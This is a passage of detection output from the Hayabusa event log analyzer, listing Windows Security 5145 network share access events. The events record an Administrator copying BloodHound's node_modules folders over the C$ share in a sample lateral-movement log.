0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap | IP Addr: 10.0.2.15 | LID: 
